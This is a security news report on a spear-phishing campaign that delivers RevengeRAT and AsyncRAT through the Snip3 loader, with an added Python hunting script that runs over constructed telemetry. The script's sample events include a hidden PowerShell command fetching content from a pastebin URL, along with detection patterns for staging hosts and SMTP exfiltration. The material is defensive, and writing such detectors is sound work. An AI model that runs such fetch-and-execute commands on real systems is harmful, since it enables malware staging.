Microsoft describes an ongoing spear-phishing campaign targeting aerospace and travel organizations with remote access Trojans (RATs).
For the past few months, Microsoft has been tracking a campaign in which attackers send spear-phishing emails that distribute a new loader, which in turn delivers RevengeRAT or AsyncRAT.
Attackers send phishing emails that use image lures posing as PDF documents tailored to be relevant to a certain industry sector, such as aviation, travel, or cargo.
Microsoft says the threat actors are after data on the victims’ infected devices, which they harvest and exfiltrate using the RATs’ remote control, keylogging, and password-stealing capabilities. The malware’s operators can steal credentials, screenshots, browser data, webcam data, clipboard data, and system and network information, which the RATs then exfiltrate over SMTP on port 587.
Microsoft’s security team described a new loader that threat actors rent out to other hackers in a Crypter-as-a-Service model. First discovered by the security firm Morphisec, the Snip3 loader has been observed dropping Revenge RAT, AsyncRAT, Agent Tesla, and NetWire RAT payloads on compromised systems.
“The Crypter is most commonly delivered through phishing emails, which lead to the download of a visual basic file. In some cases, however, the attack chain starts with a large install file, such as an Adobe installer, which bundles the next stage,” Morphisec experts say.
Snip3 can identify sandboxing and virtual environments, according to Morphisec, and thus effectively avoid detection by anti-malware solutions.
The malware loader uses other techniques as well to evade detection:
- PowerShell code with the ‘remotesigned’ parameter
- Pastebin and top4top for staging
- RunPE loaders on the endpoint in runtime
For administrators who want to secure their system against this ongoing phishing campaign, Microsoft shared sample queries for advanced hunting using Microsoft 365 Defender to help them detect suspicious behavior.
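The exfiltration and evasion behaviours described above (SMTP submission on port 587, PowerShell launched with the ‘remotesigned’ parameter, and Pastebin/top4top used for staging) are the kind of signals a hunting query looks for. The following is an added example, not Microsoft’s advanced hunting queries and not code from Morphisec’s report: it runs simple triage heuristics over a handful of constructed process-creation and network events. The field names, the sample values, the mail-client allowlist, and the user-profile VBS heuristic are all assumptions made for the example.

```python
"""Added example: toy hunting heuristics over constructed endpoint telemetry.
Not Microsoft's or Morphisec's code; field names and sample events are assumed.
"""
import re

# Constructed sample process-creation events (not real telemetry).
PROCESS_EVENTS = [
    {"host": "ws01", "process": "powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy RemoteSigned -File C:\\Users\\a\\AppData\\Local\\Temp\\inv.ps1"},
    {"host": "ws02", "process": "powershell.exe",
     "cmdline": "powershell.exe -ep remotesigned -w hidden -c \"iwr https://pastebin.com/raw/EXAMPLE\""},
    {"host": "ws03", "process": "wscript.exe",
     "cmdline": "wscript.exe C:\\Users\\b\\Downloads\\itinerary.vbs"},
    {"host": "ws04", "process": "powershell.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Service"},
]

# Constructed sample outbound network events (not real telemetry).
NETWORK_EVENTS = [
    {"host": "ws01", "process": "powershell.exe", "dst_port": 587, "dst": "203.0.113.10"},
    {"host": "ws05", "process": "outlook.exe",    "dst_port": 587, "dst": "198.51.100.5"},
    {"host": "ws02", "process": "powershell.exe", "dst_port": 443, "dst": "pastebin.com"},
]

# Staging services named in the article; mail clients allowed to use port 587 (assumed list).
STAGING_HOSTS = ("pastebin.com", "top4top")
MAIL_CLIENTS = {"outlook.exe", "thunderbird.exe"}

# Matches "-ExecutionPolicy RemoteSigned" and abbreviated forms such as "-ep remotesigned".
REMOTESIGNED = re.compile(r"-e\w*\s+remotesigned")
# Assumed heuristic: a .vbs script run from somewhere under a user profile.
USER_PROFILE_VBS = re.compile(r"\\users\\[^\\]+\\.*\.vbs\b")


def flag_process(ev):
    """Return the list of reasons a process-creation event looks suspicious."""
    reasons = []
    proc = ev["process"].lower()
    cmd = ev["cmdline"].lower()
    if proc == "powershell.exe" and REMOTESIGNED.search(cmd):
        reasons.append("powershell remotesigned")
    if any(h in cmd for h in STAGING_HOSTS):
        reasons.append("staging host in command line")
    if proc == "wscript.exe" and USER_PROFILE_VBS.search(cmd):
        reasons.append("vbs run from user profile")
    return reasons


def flag_network(ev):
    """Return the list of reasons an outbound connection looks suspicious."""
    reasons = []
    if ev["dst_port"] == 587 and ev["process"].lower() not in MAIL_CLIENTS:
        reasons.append("smtp submission from non-mail process")
    if any(h in ev["dst"].lower() for h in STAGING_HOSTS):
        reasons.append("connection to staging host")
    return reasons


def hunt(process_events, network_events):
    """Run both heuristics and return (host, process, reasons) tuples for every hit."""
    hits = []
    for ev in process_events:
        reasons = flag_process(ev)
        if reasons:
            hits.append((ev["host"], ev["process"], reasons))
    for ev in network_events:
        reasons = flag_network(ev)
        if reasons:
            hits.append((ev["host"], ev["process"], reasons))
    return hits


if __name__ == "__main__":
    for host, process, reasons in hunt(PROCESS_EVENTS, NETWORK_EVENTS):
        print(f"{host}: {process}: {', '.join(reasons)}")
```

These heuristics are deliberately broad: a legitimate administrator setting the execution policy, or an application that legitimately submits mail, will also match, so the output is a triage list to be checked against the indicators Microsoft and Morphisec published, not a verdict.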
Additionally, Morphisec has provided indicators of compromise associated with this spear-phishing campaign, malware sample hashes, and RAT command and control domains in their report.